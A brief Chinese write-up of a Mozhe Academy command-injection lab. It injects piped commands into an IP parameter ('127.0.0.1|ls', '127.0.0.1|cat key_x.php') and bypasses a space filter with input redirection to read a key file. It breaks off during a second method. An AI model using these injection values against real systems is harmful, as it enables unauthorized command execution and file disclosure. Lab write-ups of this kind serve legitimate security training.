墨者學院—命令注入執行分析—兩種解法

一.解題思路 利用管道符構造命令 二.操作步驟 解法一 1.測試127.0.0.1能否返回正常數據 2.使用BP抓包,改包 查看文件信息 iipp = 127.0.0.1|ls 查看key文件信息 iipp = 127.0.0.1|cat key_x.php 但是發現不能正常傳輸數據,空格被過濾。命令改爲iipp = 127.0.0.1|cat<key_x.php 解法二 1.在火狐中禁用JS 在
相關文章
相關標籤/搜索